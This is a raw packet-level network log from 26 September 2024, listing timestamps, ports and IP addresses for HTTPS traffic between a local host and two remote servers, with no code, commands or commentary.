Sep 26, 2024 17:55:26.270088911 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.270092010 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.270134926 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.270138979 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.270179987 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.270474911 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.270479918 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.270625114 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.270652056 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.270684004 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.270700932 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.270704985 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.270725965 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.271203041 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.271229982 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.271411896 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.271416903 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.271564960 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.271572113 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.271578074 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.271651030 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.271668911 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.271692991 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.271723986 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:26.271960974 CEST	49722	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:26.271975994 CEST	443	49722	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:26.272051096 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.272227049 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.272232056 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.275079966 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.275150061 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.275403023 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.275408983 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.275753021 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.279231071 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.286221027 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.286262035 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.286417961 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.286423922 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.286659002 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.289822102 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.292500973 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.292557955 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.292567968 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.292601109 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.293035984 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.293041945 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.294717073 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.295208931 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.295213938 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.299092054 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.299179077 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.299190998 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.302380085 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.302470922 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.302474976 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.307279110 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.307410002 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.307419062 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.310437918 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.310621977 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.310630083 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.312177896 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.312231064 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.312241077 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314078093 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314233065 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314238071 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.314244986 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314367056 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.314369917 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314389944 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314431906 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.314436913 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314763069 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314811945 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.314821959 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.314905882 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.315223932 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.315229893 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.315326929 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.315401077 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.315404892 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.316570044 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.316596985 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.316770077 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.316776037 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.316848040 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.316879988 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.316931009 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.316931009 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.316936016 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.317219973 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.317254066 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.317265034 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.317274094 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.317393064 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.317425966 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.317465067 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.317465067 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.317470074 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.318247080 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.318361998 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.318465948 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.318471909 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.318603992 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.318629026 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.318696022 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.318742990 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.318747997 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319035053 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319078922 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.319087982 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319098949 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319278002 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319329023 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319364071 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319365978 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.319365978 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.319376945 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319425106 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.319508076 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319791079 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319822073 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.319983959 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.320025921 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.320025921 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.320030928 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.320069075 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.320242882 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.320249081 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.322417021 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.322477102 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.322485924 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.322568893 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.322597027 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.322617054 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.322622061 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.322890997 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.322896004 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.351630926 CEST	443	49723	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.351761103 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.351793051 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.351823092 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.351840973 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.351852894 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.351878881 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.351881981 CEST	49723	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.351907969 CEST	443	49723	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.352057934 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.352122068 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.352127075 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.352236032 CEST	443	49723	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.352675915 CEST	49723	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.352741003 CEST	443	49723	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.353394032 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.353434086 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.353508949 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.353689909 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.353697062 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.353754997 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.353945017 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.353990078 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.354051113 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.354073048 CEST	49723	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.354104996 CEST	443	49723	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.354243040 CEST	49733	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.354258060 CEST	443	49733	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.354384899 CEST	49734	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.354397058 CEST	443	49734	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.354551077 CEST	49735	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.354568005 CEST	443	49735	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.355268955 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.355380058 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.355390072 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.355451107 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.355488062 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.355509996 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.355516911 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.355560064 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.355681896 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.358997107 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.359086037 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.359091043 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.359196901 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.359230995 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.359249115 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.359252930 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.359302044 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.359307051 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.362447023 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.362505913 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.362510920 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.362617016 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.362647057 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.362678051 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.362687111 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.362690926 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.362732887 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.372005939 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.372037888 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.372056007 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.372066021 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.372075081 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.372102022 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.387593985 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.387646914 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.387682915 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.387712955 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.387723923 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.387723923 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.387738943 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.387799025 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.387918949 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.397191048 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.397237062 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.397270918 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.397285938 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.397345066 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.397360086 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.397366047 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.397413015 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.397434950 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.397440910 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.397511959 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.408900023 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.408957958 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.409014940 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.409029007 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.409145117 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.409172058 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.409189939 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.409195900 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.409260035 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.415173054 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.415345907 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.415374994 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.415401936 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.415412903 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.415471077 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.415476084 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.415652990 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.415712118 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.415718079 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.415869951 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.415925026 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.415930986 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.416043997 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.416073084 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.416130066 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.416135073 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.416203022 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.417036057 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417212009 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417296886 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.417304039 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417406082 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417433023 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417459965 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417486906 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417500019 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.417500019 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.417505026 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417555094 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.417906046 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417963982 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.417990923 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.418034077 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.418039083 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.418081045 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.418797970 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419008970 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419040918 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419116020 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419118881 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.419126034 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419209957 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.419214964 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419260979 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.419265032 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419325113 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419353008 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419379950 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419404984 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.419409990 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419430017 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.419436932 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419481993 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.419486046 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419496059 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419537067 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419553041 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.419557095 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419580936 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419604063 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.419610023 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.419651031 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.422033072 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.422225952 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.422285080 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.422290087 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.423935890 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.423963070 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.424020052 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.424026012 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.424129009 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.424150944 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.424156904 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.424205065 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.424591064 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.450371981 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.450424910 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.450428009 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.450468063 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.450535059 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.450546980 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.450592995 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.450684071 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.450690031 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.454474926 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.454514980 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.454557896 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.454565048 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.454608917 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.454639912 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.454647064 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.454711914 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.454915047 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.454957008 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.454994917 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.455003023 CEST	49721	443	192.168.2.16	172.217.16.132
Sep 26, 2024 17:55:26.455008030 CEST	443	49721	172.217.16.132	192.168.2.16
Sep 26, 2024 17:55:26.455035925 CEST	443	49721	172.217.16.132	192.168.2.16
